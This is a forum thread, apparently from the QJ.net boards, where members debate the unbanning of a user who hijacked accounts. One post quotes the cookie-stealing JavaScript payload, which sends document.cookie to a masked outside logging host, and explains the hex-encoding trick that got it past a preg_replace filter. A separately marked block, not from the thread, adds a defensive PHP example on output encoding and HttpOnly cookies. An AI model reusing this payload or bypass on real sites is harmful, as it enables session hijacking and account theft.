A security hole was used to run the script, that sounds like he exploited it.
Quote:
Quote from EvilSeph
Thank you, Evilseph, for your analysis. Clearly I was wrong and I should have probably left it to someone more knowledgeable than me to post a thread regarding the recent issues.
Quote:
Quote from EvilSeph
Just so this discussion ends, I tell you exactly how the exploit worked.
A link to a picture was posted on QJ. This picture did not exist, the .htaccess file was modified to redirect to myQJ when you clicked the file.
This would take you to MyQJ and it would put javascript in the search box and search it. The javascript was:
Code:
<script>location.href="http://*******************/log.php?893801"+document.cookie</script>
Where whiteacid is a site for anonymous cookie stealing.
Now usually the php function preg_replace would get rid of any scripts, however the script was written in hex characters, so preg replace would not actually work.
The result would be that your cookie will be sent to that site and TMM could use it. A person who clicked the link would come up with an error, be redirected to myqj and get more errors there.
I don't think the admins will mind me posting this as they have expert security advice now so this kind of stuff won't work anymore.
Evilseph, If there is anything I have misunderstood, please correct me. I am still learning and I don't want to give out false information.
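The filter bypass PopeOfDope describes, shown from the defender's side as an added example; this is not code from the thread or from MyQJ. It assumes a hypothetical search handler whose script-stripping `preg_replace` runs before the value is percent-decoded; the function names, cookie name and sample value are constructed.

```php
<?php
// Added example: hypothetical search handler, not MyQJ's code.

// Weak: strip <script> with a blacklist regex, then decode. The pattern never
// matches the percent-encoded form, so decoding afterwards rebuilds the tag.
function weak_filter(string $raw): string
{
    $stripped = preg_replace('#<script\b[^>]*>.*?</script>#is', '', $raw);
    return urldecode($stripped);
}

// Hardened: decode first, then encode for the HTML context at output time.
// Nothing is stripped; markup characters are rendered as text.
function safe_echo(string $raw): string
{
    return htmlspecialchars(urldecode($raw), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Session cookie that page script cannot read via document.cookie.
// Cookie name is an assumption; array options need PHP 7.3+.
if (PHP_SAPI !== 'cli') {
    setcookie('session', bin2hex(random_bytes(16)), [
        'path' => '/', 'secure' => true, 'httponly' => true, 'samesite' => 'Lax',
    ]);
}

// Constructed sample: a harmless marker, percent-encoded ("hex characters").
$sample = '%3Cscript%3Ealert(1)%3C%2Fscript%3E';

echo 'weak: ', weak_filter($sample), PHP_EOL;
echo 'safe: ', safe_echo($sample), PHP_EOL;
```

With `httponly` set, `document.cookie` no longer exposes the session cookie even if a script does reach the page.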
the only thing is that none of the staff were told of this beforehand
this thing made me laugh out hard.
My apologies. I formatted my post wrong.
Quote:
Quote from Gutya
I meant, you are wrong, with regards to: " The security hole was in MyQJ."
It wasn't. It affects any script/"software" that uses cookies. Any cookie can be stolen, the fact it happened on myQJ is irrelevant. It could have been used on these forums.
The "it's not really an exploit" part was a whole other indirectly related point.
@PopeOfDope, your analysis is close enough. There is more than one way to use the "security hole" though.
Okay, I just read most of this thread.
I'll give my opinion.
I'm not annoyed by Mysticales decision to unban milkman.
BUT I have to say, whenever you ban someone now you know there is going to be complete uproar.
The users of this forum will always hold this against you. And why not?
I'm going to use a previous ban of my own in example to this.
I got banned for a month for having this as my sig:
'You have banned for the following reason:
"take you **** our the umd tray" is not a valid post'
Basically it was a printscreen of my previous ban.
Now what my ban has in common with TMM hacking is that they both disrespected the Site and its authority.
I got banned for a month. But TMM gets welcomed with open arms.
Now I'm not holding a grudge against QJ but I'm just saying your quick justice policy needs looking at some more.
I also agree with what others have said. I think you're scared TMM is going to hack the site again, therefore giving him a place on these forums will make him stop. Well he has got what he wanted.
But I think you will regret this in the long run.
Thank you, and good day :)
I have to say SeanyP just pwned this thread and situation.
End of.
I think people are over analyzing this way too much! Give it a month, everything will be back to normal and people will have forgotten.
When the MD closed people were "going mad" (as mad as you get on the net), they said the same kinda things as they are saying here.
When TMK was banned everyone went up in arms but again everyone forgot and when he was unbanned everyone was kinda like: "Huh, he's back". That actually brings up a good point TMK was permabanned and came back, he is far better than he was.
Just give this time to blow over. ;)
PopeOfDope's analysis is correct.
What I meant is, he used a vulnerability in MyQJ, it may be in the CMS in such a way that it appears on the front page of each blog, but that would be impossible for me to tell without inside knowledge or access to the underlying code. I just said MyQJ because that is where the rewrite rules on MY server pointed in order to run the cookie stealer. It is obvious that somewhere on the page, data collected from a GET var is echoed.
Quote:
Quote from EvilSeph
Agreed.
Quote:
Quote from Chathurga
You clearly have no clue what you're talking about.
Quote:
Quote from Gutya
He did not use a vulnerability in MyQJ.
The little trick he used (I refuse to call it an exploit anymore), allows him to specify what url the user will be redirected to AFTER the cookie copying is done. That url could have been ANY site. The fact MyQJ was specified is IRRELEVANT.
I think you're overlooking the fact NeilR has decided to possibly retire due to this.
Quote:
Quote from Chathurga
Okay then, humor me. How DID he run the code?
Quote:
Quote from EvilSeph
I am not trying to be a prick, but you are wrong. I'm not trying to be an 'internet *******' but I know the EXACT method he used.
Quote:
Quote from EvilSeph
I'm glad I got a good amount of feedback on my views about this :dry:
He DIDN'T run any code on MyQJ. NO EXPLOIT WAS USED. He simply had people click a link that led to a non-existent file, that redirected the user to the cookie stealing script (of which he probably has no idea how it works) and THAT did all the work.
Quote:
Quote from Gutya
No malicious code was injected anywhere. No exploit was used. No vulnerability was used.
A lot of staff members have said this from time to time, none have actually gone through with it.
Quote:
Quote from EvilSeph
The only vulnerability here is peoples' failure to be alert.
Stop acting like a five year old on a diving board telling people to look at him for attention and praise. If you aren't going to stay on topic here, you will be banned from the thread, as most other off topic posters have already been.
Quote:
Quote from SeanyP
Quote:
Quote from EvilSeph
I'm sorry, but you don't really know what you are talking about in this case. I am not trying to flame you, emotions are hard to display over a forum, I mean this in the nicest way possible.
If you have MSN, I can talk to you about how he actually did it, as you seem to be someone who knows their stuff, I'd just rather not post it here.
So you trying to tell me I had NO valid points in my other post?
Quote:
Quote from Abe_Froeman
You had some valid, albeit repeated points in your post. You don't need someone quoting you and saying 'zomg best post ever' all the time. Asking for compliments is even worse.
Quote:
Quote from SeanyP
Just be happy that you contributed to a discussion in what little way you can and now your thoughts are being read by a lot more people.
Um yea looking at the info myself nothing was injected nor exploited at all. The only thing that qj.net or myqj was, was a target site. All was done was a kiddiescript linked to whiteacid to get the cookie to use it as the session key nothing more nothing less. Pretty much the method of what Pope mentioned was correct. As there was no real injection. Any site could have been targeted go google whiteacid and the site tells you how it does it.
Quote:
Quote from Gutya
wow thanks for hacking my account
Edit:
Nothing happened.
What the hell, Milkman was banned, Period. WTF is wrong with you guys, if someone is banned they are banned, especially if they hacked the forum. Who gives a **** about an apology? I am sorry but if everyone could just be un-banned by 'helping' out with something then anyone banned could be un-banned. FFS man.
i seriously agree, if this is the case Xandu should be unbanned. (not that i want him to) but to make it fair
Quote:
Quote from TheEx
wow way to give some other random wannabe hacker the means to go hack some random site then think they're hardcore or "1337" i think the point that's to be gotten is that a lot of ppl are pissed off that this guy is back because he made a place that a lot of us like to view as safe unsafe
I get that and I agree a part of it but seriously, un-banning someone is just stupid...
he broke the rules, simple as, when someone breaks a rule they get banned
Quote:
Quote from -Xin-
yea i understand that its like if i went out on the street and sold drugs to a cop i would go to jail they wouldn't say well at least you didn't sell them to a kid and let me go
Unlike many people that have posted, I'm not here to get banned for calling the staff "gay", "retards", or "Insolent pricks" (In any form of wording). I am here to say that the rules here need revising. If someone were to use a weird wording that may have insulted someone and gets banned for over 3 weeks, ffs, why the hell would a hacker, proving a legit point or not, BEFORE notifying ANYONE, be unbanned? This is ****ing insanity! Plus, on top of that, you give the point that TMM did a SMALL hack. Um... Did you by any chance forget Xandu? He did ONE small thing, and gets perma-banned. TMM does several "small" things (that got 1/15 of all QJ member's sigs jacked up or banned) and you decide to give him a second chance? See why that doesn't measure up? Not to start a conspiracy but, I may temp ban myself for a couple weeks/days so that this gets out of my mind.
My point is, qj's qjp is HORRIBLE. All rules need revising from time to time. The fact that I haven't seen anyone from the staff telling ANYONE that the staff is looking over it to see what needs changing disturbs me. So e-mail me when that happens because as of now, i am really pissed and probably will leave this whole website and not return until I am told that the rules here have changed for the better.
No offense to the staff, but could that be arranged?
Ok whatever, lets not go offtopic.
@King_kong: so right.
When a revision to any policy happens, it will be noted/bumped in whatever thread is getting revised. To say they are being revised currently would be a lie, but I see some happening in the near future since they are pretty much needed at the moment.
I may spearhead this effort or I may not, that's still to be determined and discussed backstage. Once something worth reporting is necessary, it will be made public.
Xandu was banned, not for doing this one small thing, but for lying about it and hiding it. Get your facts straight before you go off on a hissy fit.
Quote:
Quote from King_Kong1985
Thank you, and thespiral, stfu.
Quote:
Quote from Abe_Froeman
i agree with king kong
Let me inject my worthless 2 cents into this thread. I've read this whole thread during the course of today and I must say I agree 100% with the evil... guy (don't remember the last part).
I fail to understand why the heck milkman is unbanned. He caused trouble and hacked into members' accounts, mostly mods' accounts at that. He moved threads, changed posts, and got some users banned. Now that's all fine and dandy the first time I guess and I could see a second chance but he did this to so many people's accounts it's not right to give him another chance. Of course he said he has changed. He desperately wanted to be back here as evident by his hacking and you let him back after all that. People here have said he deserves another chance, he's changed etc. Those that have said that need a reality check big time. He didn't change any from last night, he is still the same person as he was.
I don't fault the milkman at all. If anything I applaud(?sp) him on doing what he set out to do. He caused the forums trouble and got what he wanted and that was to be back. If only society worked where rule breakers could be allowed back and their demands given in to. I don't know what message myst is trying to send but if anything my view of her dropped drastically. Our site admin is weak and gave in due to a problem. She should have reported him to the powers that be and got him in serious trouble. Letting him back doesn't solve a thing it only weakens the users' view on the admin. I am sorry myst but imo you made a big mistake. Not unbanning him really but showing you made a stand and allowed a user to be perma banned then you let them back even though they caused you a lot of stress. You truly are our fearless leader. Let's just be glad you don't run the courts.
<3 to the milkman. He did what he set out to do and he made the forums and its staff into a joke. (not all the staff)
I also anticipate some saying it aint all myst's fault etc. I will say this upfront it isn't solely her fault but when you run something you are accountable. She runs the forum and does some great things, but imo she is at fault here
Some of you are way too protective over these forums. You are treating them like you bluddy children.
TBH if he is helping Myst patch all the security issues get the **** over it, he is god damn helping and making the forums more safe. FOR YOU TO USE, if he dunt help a more dangerous hacker team aka alysis (or sommat along them lines) is going to come and delete the bloody forums. And trust me they would they have hacked every type of forum board and they are total pricks.
I somewhat agree with you, but i certainly don't applaud him.
Quote:
Quote from DMX
Let's put it this way. You leave your car door open and I see it. I can do 2 things:
Quote:
Quote from JIBBS
1) Steal your car and tell you later that I did it and you shouldn't leave your car door open. In the process of stealing your car I killed 10 people.
2) I could tell you your car door is open so that you can close it yourself.
Now obviously account hijacking is not as bad as killing people, but to assume that the only way to warn someone of their fault is by exploiting it is stupid.
I don't applaud his actions of hacking, i applaud him doing something most people would have loved to do and that is make a higher authority submit basically
Quote:
Quote from C-Money